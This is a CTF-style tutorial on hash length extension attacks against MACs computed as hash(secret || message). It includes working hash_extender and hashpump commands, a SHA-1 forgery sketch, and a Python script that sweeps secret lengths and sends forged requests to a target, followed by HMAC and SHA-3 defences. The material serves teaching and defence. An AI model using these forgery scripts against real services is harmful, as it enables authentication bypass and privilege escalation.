Can you forge a MAC without knowing the secret?
If a service authenticates messages by computing signature = hash(secret || message) with a plain Merkle-Damgard hash (MD5, SHA-1, SHA-256), then yes. You can take a message and its valid signature, append your own bytes to the message, and compute a valid signature for the new, longer message without ever knowing the secret. This is the hash length extension attack, and it is one of the highest-reward bugs in CTF crypto and web categories because it looks like a real authentication scheme and is not one.
The digest of a Merkle-Damgard hash is not a fingerprint. It is a saved checkpoint of the machine. Hand someone the checkpoint and they can keep running the machine from where you stopped.
Everything you need to pull it off:
- The original
message(the known, signed data). - The original
signature(the hex digest the server handed you). - The bytes you want to
append(for example&admin=true). - The length of the
secretin bytes. You do not know it, but you can brute force it in seconds.
Feed those to hashpump or hash_extender and the tool prints a new message and a new signature that the server will accept. The rest of this post explains why this works, how to run it, how to handle the unknown secret length, and why HMAC and SHA-3 make the whole attack disappear. If you want to first confirm which hash you are looking at, the on-site hash identifier tells you whether a digest is MD5, SHA-1, or SHA-256 from its length alone.
Why does a plain hash leak its own internal state?
MD5, SHA-1, and SHA-256 are all built on the Merkle-Damgard construction. The hash holds a fixed-size internal state (for SHA-256 that is eight 32-bit words, 256 bits total). It chops the input into fixed-size blocks (64 bytes for all three of these), and for each block it runs a compression function that mixes the block into the state. When the input runs out, it appends padding, processes the final block, and outputs the state as the digest.
The structure looks like this:
state = IV # fixed initialization vectorfor block in blocks(message + padding):state = compress(state, block)digest = state # <-- the output IS the final state
Read that last line again. The digest is a verbatim copy of the internal state after the last block. There is no final scrambling step that hides it, no key folded in at the end. So when the server hands you a hex digest, it has handed you the exact register contents the compression function would be sitting on if it were about to process one more block.
len(secret) + len(message) + len(original_padding), and the only unknown in it is the secret length. That single unknown is the entire difficulty of the attack, and it is small enough to brute force.The padding is the other half of the trick, so it is worth seeing exactly. Merkle-Damgard padding (the "MD strengthening" scheme) appends a single 0x80 byte, then enough 0x00 bytes to leave room, then the total bit length of the input as a 64-bit integer, so the whole thing is a multiple of 64 bytes:
# message = b'COMMAND=getbalance' (18 bytes) with a 14-byte secret# the hash actually processed: secret(14) || message(18) = 32 bytes of datapadding = b'\x80' + b'\x00' * 23 + struct.pack('>Q', 256) # 32-byte message = 256 bits, big-endian length# glue byte zero fill 64-bit big-endian bit length# 32 data bytes + 32 padding bytes = 64 = exactly one block
That padding (the 0x80, the zeros, and the length field) is called the glue padding. It is part of what got hashed to produce the signature you hold, so it becomes part of the message you forge. The server computed the digest over secret || message || glue_padding as a complete block, and your forged message will contain that glue verbatim.
What exactly is the vulnerable pattern?
The bug is the construction MAC = hash(secret || message), where || is concatenation. A developer wants to stop clients from tampering with a query string, a cookie, or an API parameter, so they prepend a server-only secret and hash the whole thing. The client gets the message plus the hash. To verify, the server recomputes hash(secret || message) and compares.
It feels airtight. The client never sees the secret, and changing a single byte of the message produces a wildly different hash. The flaw is that the attacker does not need to keep the hash the same. They are allowed to extend the message, and the construction lets them compute the new hash for the extended message for free.
A canonical vulnerable endpoint looks like this:
GET /api?user=guest&role=user&mac=df3e... HTTP/1.1# server side, in pseudo-python:def verify(query, mac):expected = sha256(SECRET + query).hexdigest() # secret || messagereturn hmac_unsafe_equals(expected, mac) # plain hash, not HMAC# if it parses the LAST value of a repeated key, appending# &role=admin# to the query overrides role=user, and length extension# produces a mac the server will accept.
hash(message || secret) is not vulnerable to this attack. Second, your appended bytes have to actually change the server's decision after it parses the message. The glue padding (raw 0x80 and null bytes) ends up in the middle of your forged message, so the parser has to tolerate or ignore it. Query strings, cookies, and many ad-hoc serialization formats do tolerate it.How does length extension forge a valid MAC?
Here is the whole attack in one breath. The server computed signature = hash(secret || message). That signature is the hash's internal state right after it absorbed secret || message || glue_padding. You load that state back into a fresh hash object, tell it how many bytes it has "already" processed, and feed it your append bytes. The hash continues as if it had been computing secret || message || glue_padding || append all along, and it outputs a valid signature for exactly that string.
Step by step:
- Take the known
signatureand split it back into the hash's state words (8 words for SHA-256, 5 for SHA-1, 4 for MD5). - Reconstruct the glue padding that the original
secret || messageblock would have used. This needs the secret length, which you guess. - Build the forged message as
message || glue_padding || append. This is the data the server will think it signed. - Resume the hash from the loaded state, with its length counter preset to
len(secret) + len(message) + len(glue_padding)bytes, and absorbappend. The output is the forged signature. - Send
forged_messageandforged_signatureto the server. It computeshash(secret || forged_message)and gets the same value, because that is exactly the computation you just continued.
A minimal hand-rolled version against SHA-1 makes the mechanism concrete. The library here is pure-sha1-style code that exposes the state and prelength; the real tools below do all of this for you, but seeing it once removes the magic:
from pwn import * # pwnlib has a length-extension helper tooorig_msg = b'user=guest&role=user'orig_sig = '6b9e...' # hex digest from the server (SHA-1, 40 chars)append = b'&role=admin'guess_len = 14 # guessed secret length in bytes# 1) load the digest back into the SHA-1 state, set the byte counterh = SHA1_from_state(bytes.fromhex(orig_sig))h.set_processed_length(guess_len + len(orig_msg)) # data before glue# 2) the library appends correct glue padding for that length, then our bytesglue = sha1_padding(guess_len + len(orig_msg))forged_msg = orig_msg + glue + appendforged_sig = h.update(append).hexdigest()print(forged_msg) # send this as the messageprint(forged_sig) # send this as the mac
Notice what never appears in that script: the secret's value. Only its length matters, and only because the length determines where the glue padding falls. The secret could be a 14-character passphrase or 14 bytes of random key material; the forgery is identical either way.
How do you run it with hashpump or hash_extender?
Nobody hand-rolls the state surgery in a CTF. Two tools own this attack: hash_extender (the reference implementation, supports MD4, MD5, RIPEMD-160, SHA-0, SHA-1, SHA-256, SHA-512, WHIRLPOOL) and hashpump (simpler interface, MD5 and the SHA family). Both take the same four inputs and print the forged message and forged signature.
hash_extender with explicit flags:
$ hash_extender \--data 'user=guest&role=user' \--secret 14 \--append '&role=admin' \--signature 6b9e1f...c0 \--format sha256 \--out-data-format htmlType: sha256Secret length: 14New signature: 2f5d9c7a...e41bNew string: user%3dguest%26role%3duser%80%00%00...%01%70%26role%3dadmin
The --out-data-format html flag URL-encodes the raw glue bytes so you can paste the result straight into a query string. Use hex if you need to post-process it, or cgi for cookie contexts. The New string is your forged message and New signature is the MAC to send alongside it.
hashpump does the same job with a terser interface:
$ hashpump \-s 6b9e1f...c0 \ # original signature--data 'user=guest&role=user' \-a '&role=admin' \ # data to append-k 14 # key (secret) length in bytes2f5d9c7a...e41b # forged signature (stdout line 1)user=guest&role=user\x80\x00...&role=admin # forged message (line 2)
-s: 32 hex chars means MD5, 40 means SHA-1, 64 means SHA-256. If you are not sure what you are holding, run it through the hash identifier first so you pick the right --format for hash_extender.The output message contains literal high bytes (0x80 and nulls). When you put it on the wire, encode it the way the target expects: percent-encoding for URLs and cookies, raw bytes for a binary protocol. A mismatch here (sending the literal text \x80 instead of the byte) is the single most common reason a correct forgery gets rejected.
What if you do not know the secret length?
You usually do not. The secret length is the one unknown the attack needs, and it is bounded: almost every real secret is between 4 and 64 bytes. So you do not guess, you sweep. Generate a forgery for every candidate length, send each one, and keep the response the server accepts. One of them is correct, and the server itself tells you which.
A length sweep with hashpump driven from Python:
import subprocess, urllib.parse, requestsORIG_SIG = '6b9e1f...c0'ORIG_DATA = 'user=guest&role=user'APPEND = '&role=admin'URL = 'https://target.ctf/api'for keylen in range(1, 65): # sweep candidate secret lengthsout = subprocess.run(['hashpump', '-s', ORIG_SIG, '--data', ORIG_DATA,'-a', APPEND, '-k', str(keylen)],capture_output=True, text=True).stdout.splitlines()forged_sig = out[0]forged_msg = out[1].encode().decode('unicode_escape').encode('latin-1')forged_qs = urllib.parse.quote(forged_msg) # URL-encode the raw bytesr = requests.get(f'{URL}?{forged_qs}&mac={forged_sig}')if 'Welcome admin' in r.text or r.status_code == 200:print(f'[+] secret length = {keylen}')print(r.text)break
The same loop works with hash_extender by swapping the subprocess call for hash_extender --secret {keylen} ... and parsing its New signature / New string lines. Sixty-four requests is nothing; the sweep finishes faster than reading this paragraph.
Why are HMAC and SHA-3 immune?
The attack works because the digest equals the final internal state and you can resume from it. Kill either of those properties and the attack dies. HMAC and SHA-3 each kill one.
HMAC (defined in RFC 2104) wraps the hash in two keyed passes:
HMAC(K, m) = H( (K xor opad) || H( (K xor ipad) || m ) )# inner hash: H((K xor ipad) || m) -> produces a digest# outer hash: H((K xor opad) || inner_digest) -> final MAC
When you length-extend the inner hash, you can predict the inner digest's extended state, but that value is then fed through a second hash keyed with K xor opad. You do not know K, so you cannot compute the outer hash, and the MAC you control is the outer one. The resumable state you captured never reaches the output. That nested keyed structure is the entire reason HMAC exists, and it is why every signing scheme that matters uses HMAC-SHA256 rather than SHA256(secret || message).
SHA-3 (Keccak) is immune for a different reason: it is not Merkle-Damgard at all. It uses a sponge construction with a large internal state, only part of which (the rate) is exposed as output; the rest (the capacity) is never revealed. The digest is not the full internal state, so you cannot reload the machine from it. Resuming is impossible because the bytes you would need to resume were never output. BLAKE2 and BLAKE3 are likewise immune, as are the truncated SHA-2 variants SHA-512/224 and SHA-512/256, because truncation hides part of the final state.
Length extension is not a weakness in SHA-256. It is a weakness in using SHA-256 as if it were a MAC. The fix is not a stronger hash; it is HMAC.
How do you defend against it (and spot it in review)?
The defense is one line. Never authenticate with a bare hash. Use HMAC with a dedicated key:
# vulnerablemac = hashlib.sha256(secret + message).hexdigest()# safeimport hmac, hashlibmac = hmac.new(secret, message, hashlib.sha256).hexdigest()# verify in constant time, alwaysok = hmac.compare_digest(mac, provided_mac)
Other constructions that close the hole, in rough order of preference: use HMAC (the default answer); switch to a length-extension-resistant hash like SHA-3, BLAKE2/BLAKE3, or a truncated SHA-512 variant; or, if you are stuck with a Merkle-Damgard hash and no HMAC, append the secret instead of prepending and also hash twice (hash(secret || hash(secret || message)), which is essentially a hand-rolled HMAC). The clean choice is always HMAC, because the others are easy to get subtly wrong.
sha256(secret + data), md5(key + msg), or sha1(SECRET . $payload) where the result is later treated as a signature is the smell. The tell is a hash function with a secret as the first argument and the result compared against client-supplied data. If you see it, you have found the bug.Quick reference
Is it exploitable?
- The MAC is
hash(secret || message)with MD5, SHA-1, or SHA-256 (check the digest length: 32, 40, or 64 hex chars). - The secret is prepended, not appended. Appended secret is not vulnerable.
- You can see one valid
(message, signature)pair. - Your appended bytes (plus the raw glue padding) survive the server's parser and change its decision.
Tool cheat sheet
# hash_extender (explicit, many algorithms)hash_extender --data DATA --secret LEN --append APP \--signature SIG --format sha256 --out-data-format html# hashpump (terse, infers algo from signature length)hashpump -s SIG --data DATA -a APP -k LEN# unknown secret length? sweep 1..64 and let the server pickfor k in $(seq 1 64); do hashpump -s SIG --data DATA -a APP -k $k; done
For the neighboring techniques: recovering the secret behind a hash is the Hash Cracking guide; attacking signed web tokens and cookies is the Cookies and JWTs guide; and the symmetric encryption that often sits next to these MACs is the AES for CTF guide.
The whole attack fits on a sticky note: if a server signs with hash(secret || message), the signature is a checkpoint, and a checkpoint is an invitation to keep going.